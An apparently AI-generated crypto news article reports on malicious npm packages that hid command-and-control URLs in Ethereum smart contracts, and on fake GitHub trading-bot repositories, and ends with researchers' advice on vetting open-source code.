Ethereum News Today: Hackers Hijack Ethereum Code to Mask Malware Supply Chain

Generated by AI AgentCoin World
Thursday, Sep 4, 2025 4:30 am ET2min read
Aime RobotAime Summary

- Cybersecurity researchers discovered malicious npm packages using Ethereum smart contracts to hide C2 server URLs and deliver malware via blockchain queries.

- Packages like "colortoolsv2" bypassed detection by embedding infrastructure in smart contracts, triggering malware downloads when integrated into projects.

- The campaign extended to deceptive GitHub repositories posing as crypto trading bots, part of a "Stargazers Ghost Network" DaaS model using fake metrics.

- ReversingLabs reported 23 similar 2024 attacks, urging developers to vet open-source code beyond popularity metrics and adopt tools like Spectra Assure.

Cybersecurity researchers have uncovered a sophisticated campaign leveraging

Ethereum
smart contracts to deliver malware through compromised npm packages, marking a novel tactic in the evolving landscape of software supply chain attacks. The malicious packages, identified as "colortoolsv2" and "mimelib2," were published on the npm registry in July 2025 and swiftly removed after being flagged. These packages bypassed traditional detection mechanisms by embedding command-and-control (C2) server URLs within Ethereum smart contracts, a technique that obscures the malicious infrastructure from direct scrutiny within the package files themselves [1].

The malicious functionality of these packages is triggered when they are included in other projects, causing the packages to query the Ethereum blockchain for URLs to download the second-stage malware payload from an attacker-controlled server. This approach complicates detection efforts, as blockchain traffic is inherently legitimate and not typically flagged by standard security tools [2]. Unlike conventional malware downloaders, which often include URLs or commands directly in package scripts, the use of smart contracts in this campaign represents an innovative method of evading detection while maintaining operational stealth [3].

The broader campaign extends beyond npm packages to include a network of GitHub repositories that were designed to appear as credible cryptocurrency trading bots. These repositories featured fabricated activity, including numerous commits, fake user accounts, and artificial forks and stars to create the illusion of legitimacy and popularity. The repositories, such as "solana-trading-bot-v2," were structured to appear as open-source tools for automated on-chain trading. However, the underlying activity was deceptive, with malicious packages being included as dependencies through staged commits [4]. The repositories were found to be part of a distribution-as-a-service (DaaS) model known as the "Stargazers Ghost Network," which relies on sockpuppet accounts to inflate metrics and deceive developers [5].

The threat actors behind this campaign are part of a larger trend of software supply chain attacks targeting cryptocurrency developers. According to ReversingLabs' 2025 Software Supply Chain Security report, at least 23 similar campaigns were observed in 2024, including an incident where the PyPI package "ultralytics" was compromised to deliver a cryptocurrency miner. These attacks highlight a growing sophistication in the tactics used by threat actors, who are increasingly leveraging both blockchain and open-source infrastructure to distribute malware [6]. The use of Ethereum smart contracts in this context demonstrates a new level of complexity and adaptability in threat actors’ strategies to evade traditional cybersecurity defenses [7].

ReversingLabs researchers emphasize the importance of rigorous vetting by developers when incorporating open-source libraries into their projects. This includes scrutinizing not only the number of stars, commits, or maintainers associated with a package but also the credibility of the developers behind it. Developers are urged to examine the codebase thoroughly and assess the package’s purpose and behavior beyond surface-level indicators of popularity. The firm has also released tools such as the Spectra Assure Community platform to assist in the triage of open-source packages and reduce the risk of malicious code infiltration [8].

The discovery of these malicious packages underscores the need for stronger security practices within the cryptocurrency and open-source development ecosystems. As attackers continue to refine their methods, the line between legitimate and malicious tools becomes increasingly blurred, requiring heightened vigilance and proactive defenses to mitigate the risks posed by evolving threats [9].

Source: [1] Ethereum Contracts Used to Load Malicious Code (https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code) [2] Malicious npm Packages Exploit Ethereum Smart Contracts (https://thehackernews.com/2025/09/malicious-npm-packages-exploit-ethereum.html) [3] Malicious npm Packages Exploit Ethereum Smart Contracts (https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit/) [4] Malicious npm packages use Ethereum blockchain for malware delivery (https://www.csoonline.com/article/4050956/malicious-npm-packages-use-ethereum-blockchain-for-malware-delivery.html) [5] Hackers find new way to hide malware in Ethereum smart contracts (https://www.coinglass.com/ru/news/688314)